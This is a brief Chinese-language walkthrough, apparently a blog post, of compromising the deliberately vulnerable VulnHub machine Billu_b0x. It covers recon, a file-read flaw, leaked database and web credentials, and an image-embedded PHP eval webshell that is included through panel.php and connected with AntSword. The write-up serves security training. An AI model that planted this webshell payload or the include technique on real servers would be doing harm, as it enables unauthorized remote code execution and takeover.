vulhub靶机Billu_b0x

1.下载靶机

https://download.vulnhub.com/billu/Billu\\_b0x.zip

2.信息收集

kali和靶机ip

访问靶机ip

扫描敏感目录

3.漏洞挖掘

一一访问每个文件

发现add.php是一个上传界面,但是功能无法使用,查看源码文件发现只是个页面,没有后台处理代码。in.php是php info信息。test文件下貌似可以进行传参

file传参

get传参不可以,用bp抓包转换为post传参

查看c.php源码

这是数据库连接文件,发现mysql连接用户名密码:

用户名:billu

密码:b0x_billu

数据库名:ica_lab

通过得到的mysql密码登录phpmyadmin成功

ica_lab数据库的auth表中,找到web登录的用户名:biLLu,密码:hEx_it。

登录web界面

上传图片,查看图片,存在目录浏览

webshell连接

上传图片马

GIF89a
<?php @eval($_POST['cmd']);?>

然后使用POST传参

http://192.168.126.170/panel.php

load=uploaded_images/2.png&continue=continue

蚁剑连接

相关推荐
jiunian_cn1 小时前
【Linux网络】TCP协议
linux·网络·tcp/ip
Dovis(誓平步青云)1 小时前
《Linux 构建工具核心:make 命令、进度条、Gitee》
linux·运维·学习
安当加密2 小时前
如何安全地在 Kubernetes 中管理凭据?——基于 SMS 凭据管理系统的实践探索
安全·容器·kubernetes
luluvx2 小时前
RenderDoc_GPU资源提取简述
安全
cqsztech5 小时前
oracle linux 10 +pg18 源码安装要点
linux·数据库·oracle
奥尔特星云大使5 小时前
ALTER 与 UPDATE、DROP 与 DELETE区别
linux·运维·数据库·mysql
duangww6 小时前
部署sapui5应用到linux
linux·sap fiori
siriuuus6 小时前
Linux ssh/scp/sftp命令使用及免密登录配置
linux·ssh·sftp·scp
teacher伟大光荣且正确8 小时前
Linux 下编译openssl
linux·运维·服务器